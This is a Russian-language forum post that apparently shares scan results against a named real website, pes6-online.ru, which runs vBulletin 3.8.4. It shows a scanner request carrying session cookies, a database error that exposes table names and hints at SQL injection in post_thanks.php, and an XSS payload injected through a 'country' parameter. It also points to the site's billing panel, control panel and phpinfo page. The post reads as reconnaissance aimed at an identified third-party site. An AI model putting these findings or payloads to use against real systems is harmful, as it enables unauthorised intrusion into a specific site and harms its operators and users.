булка выплюнула =) на: Code: GET /forum/post_thanks.php HTTP/1.1 Pragma: no-cache Acunetix-Aspect: enabled Acunetix-Aspect-Password: e866a2fff6bdbfb81725ca4fb6887043 Acunetix-Aspect-Queries: filelist;aspectalerts Referer: http://pes6-online.ru/forum/member.php Cookie: PHPSESSID=d744ce2f99791eadb4df525171d4bb3e; bbsessionhash=6ea2619184e9f29dbd68b36d3cfbf28d; bblastvisit=1309326788; bblastactivity=0; bbcybfr_redtopage=http%3A%2F%2Fpes6-online.ru%2Fforum%2Fforumdisplay.php; bbcalendar=0c7a8827e5e248ce210a69ac973a45eda44989a0a-3-%7Bs-7-.calyear._i-2011_s-8-.calmonth._i-6_s-8-.calview1._s-11-.displayweek._%7D; bbforum_view=2bab4d2e58c89ab344b370fcc4d27315de91e75ea-2-%7Bi-2_i-1309326811_i-3_i-1309326806_%7D; bbcfrrs=1; bbpda=1 Host: pes6-online.ru Connection: Keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Accept: */* это: Code: Ошибка базы данных в vBulletin 3.8.4: Invalid SQL: SELECT * FROM h16773_pes6post_thanks AS post_thanks INNER JOIN h16773_pes6user AS user USING (userid) WHERE post_thanks.postid IN () ORDER BY post_thanks.username ASC; Ошибка MySQL : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') ORDER BY post_thanks.username ASC' at line 1 Номер ошибки : 1064 Дата запроса : Wednesday, June 29th 2011 @ 09:56:12 AM Дата ошибки : Wednesday, June 29th 2011 @ 09:56:12 AM Скрипт : http://pes6-online.ru/forum/post_thanks.php Реферрер : http://pes6-online.ru/forum/member.php IP адрес : * Имя пользователя : Незарегистрированный Имя класса : vB_Database Версия MySQL :
На страницах Составы команд и Составы нац. команд заменив post параметр country на Code: <script>alert(/xss/)</script> получим сообщение о xss; еще, может пригодится: Биллинговая панель Панель управления сервером Информация: phpinfo() движок форума, как уже написали, vBulletin 3.8.4